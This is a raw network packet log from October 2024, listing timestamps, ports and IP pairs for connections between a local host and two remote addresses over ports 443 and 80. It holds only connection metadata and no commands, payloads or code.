Oct 7, 2024 03:15:35.688765049 CEST	443	49807	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.688853025 CEST	443	49807	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.688910007 CEST	49807	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.688977003 CEST	49807	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.689033985 CEST	443	49807	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.689066887 CEST	49807	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.689083099 CEST	443	49807	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.691704035 CEST	49812	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.691724062 CEST	443	49812	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.691801071 CEST	49812	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.691948891 CEST	49812	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:35.691962957 CEST	443	49812	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:35.799221039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:35.799519062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:35.801908970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:35.806735992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.008620977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.008661032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.008694887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.008783102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.008877993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.008950949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.008968115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.008968115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.008999109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.009027004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.009027004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.009036064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.009097099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.009120941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.009756088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.009798050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.009831905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.009851933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.009851933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.009888887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.010119915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.010155916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.010185957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.010191917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.010227919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.010251999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.119257927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.119349957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.119404078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.119458914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.119515896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.119548082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.119584084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.119580030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.119580984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.119580984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.119580984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.119580984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.119620085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.119678020 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.119678020 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.119678020 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.120033026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.120057106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.120073080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.120088100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.120104074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.120201111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.120695114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.120711088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.120728016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.120743990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.120758057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.120759010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.120799065 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.120830059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.121335030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.121366024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.121381044 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.121392012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.121396065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.121411085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.121412039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.121428967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.121431112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.121448994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.121465921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.121484995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.122318983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.122333050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.122348070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.122396946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.122396946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.229597092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.229628086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.229643106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.229666948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.229690075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.229696035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.229713917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.229748964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.229885101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.229899883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.229923964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.229927063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.229938030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.229954958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.229973078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.229990005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.230253935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.230268955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.230298042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.230298042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.230312109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.230319977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.230328083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.230340004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.230344057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.230357885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.230381966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.230398893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.230921984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.230947018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.230962992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.230964899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.230977058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.230990887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.230993032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231008053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231010914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.231023073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231029987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.231040001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231049061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.231055975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231091022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.231112003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.231790066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231806040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231821060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231846094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231852055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.231861115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231888056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.231895924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231901884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.231913090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231930017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231933117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.231945992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.231949091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.231980085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.232003927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.232737064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.232752085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.232769012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.232786894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.232790947 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.232803106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.232806921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.232819080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.232835054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.232837915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.232846975 CEST	443	49809	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.232850075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.232855082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.232866049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.232880116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.232907057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.232925892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.233844995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.233860970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.233876944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.233891964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.233907938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.233922958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.234041929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.234041929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.234041929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.234041929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.234405994 CEST	49809	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.234436989 CEST	443	49809	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.234900951 CEST	443	49808	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.235095978 CEST	49809	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.235106945 CEST	443	49809	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.236579895 CEST	49808	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.236623049 CEST	443	49808	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.237025976 CEST	49808	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.237032890 CEST	443	49808	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.292300940 CEST	443	49810	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.293288946 CEST	49810	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.293322086 CEST	443	49810	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.293884039 CEST	49810	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.293900967 CEST	443	49810	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.317193031 CEST	443	49811	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.317754984 CEST	49811	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.317816973 CEST	443	49811	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.318186045 CEST	49811	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.318193913 CEST	443	49811	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.320523024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.320725918 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.331255913 CEST	443	49809	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.331351995 CEST	443	49809	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.331439972 CEST	49809	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.331707001 CEST	49809	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.331707001 CEST	49809	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.331744909 CEST	443	49809	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.331769943 CEST	443	49809	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.333627939 CEST	443	49808	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.333899021 CEST	443	49808	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.333959103 CEST	49808	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.333988905 CEST	49808	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.334006071 CEST	443	49808	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.334017992 CEST	49808	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.334024906 CEST	443	49808	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.336829901 CEST	49814	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.336860895 CEST	443	49814	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.336874962 CEST	49813	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.336886883 CEST	443	49813	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.336939096 CEST	49814	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.336970091 CEST	49813	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.337136984 CEST	49814	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.337160110 CEST	443	49814	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.337258101 CEST	49813	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.337275982 CEST	443	49813	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.340198040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340256929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340266943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.340275049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340311050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.340347052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.340487003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340503931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340518951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340548992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340550900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.340565920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340570927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.340584040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340601921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340620995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.340656996 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.340657949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.340711117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340727091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340744019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340759993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340761900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.340779066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.340780973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.340797901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.340815067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.340841055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341048956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341077089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341094017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341101885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341109991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341130018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341130972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341147900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341150045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341166973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341183901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341185093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341185093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341209888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341211081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341228962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341631889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341649055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341675043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341691017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341707945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341716051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341723919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341737032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341741085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341758966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341777086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341782093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341782093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341792107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341806889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341809988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341829062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.341841936 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341861963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.341881037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342323065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342349052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342365980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342382908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342384100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342401981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342411041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342411041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342430115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342452049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342461109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342478037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342492104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342508078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342513084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342540026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342540026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342540026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342556953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342560053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342573881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342591047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342605114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342605114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342608929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.342627048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342647076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.342667103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.343172073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343202114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343219995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343233109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.343265057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.343265057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.343275070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343292952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343307972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343326092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343327045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.343348026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.343370914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343372107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.343372107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.343401909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343416929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343422890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.343434095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343446016 CEST	49782	80	192.168.2.5	95.164.90.97
